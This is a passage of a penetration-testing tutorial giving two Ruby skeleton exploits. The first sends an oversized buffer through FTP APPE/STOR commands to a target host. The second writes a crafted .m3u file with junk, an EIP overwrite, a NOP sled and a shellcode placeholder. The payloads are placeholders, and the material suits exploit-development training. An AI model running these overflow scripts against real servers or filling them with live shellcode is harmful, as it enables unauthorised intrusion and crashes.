Module 0x5 | Exploitation Kung Fu

Skeleton exploit

It's really a good thing to have a skeleton exploit to edit and use quickly during your exploitation process.

Network base

1
#!/usr/bin/env ruby
2
# KING SABRI | @KINGSABRI
3
require 'socket'
4
5
buffer = "A" * 2000
6
7
#--> Networking
8
host = ARGV[0]
9
port = ARGV[1] || 21
10
11
s = TCPSocket.open(host, port)
12
s.recv(1024)
13
puts "[+] Sending Username."
14
s.send("USER ftp\r\n", 0)
15
s.recv(1024)
16
puts "[+] Sending Password."
17
s.send("PASS ftp\r\n", 0)
18
s.recv(1024)
19
puts "[+] Sending Evil buffer..."
20
s.send("APPE " + buffer + "\r\n", 0)
21
total = s.send("STOR " + buffer + "\r\n", 0)
22
#--> Exploit Info
23
puts "[+] " + "Total exploit size: " + "#{total} bytes."
24
puts "[+] " + " Buffer length: " + "#{buffer.size} bytes."
25
puts "[+] Done"
26
27
s.close
Copied!
To execute it
1
ruby ftp_exploit.rb [TARGET] [PORT]
Copied!
Notice that some services has to receive from it and some does not.

File base

Creating a simple exploit file
1
#!/usr/bin/env ruby
2
# KING SABRI | @KINGSABRI
3
4
file = ARGV[0] || "exploit.m3u"
5
6
junk = "A" * 2000
7
eip = "B" * 4
8
nops = "\x90" * 8
9
shell = "S" * 368
10
exploit = junk + eip + nops + shell
11
12
File.open(file, 'w') {|f| f.write(exploit)}
13
puts "[*] Exploit size: #{exploit.size}"
Copied!
To execute it
1
ruby m3u_exploit.rb song1.m3u
Copied!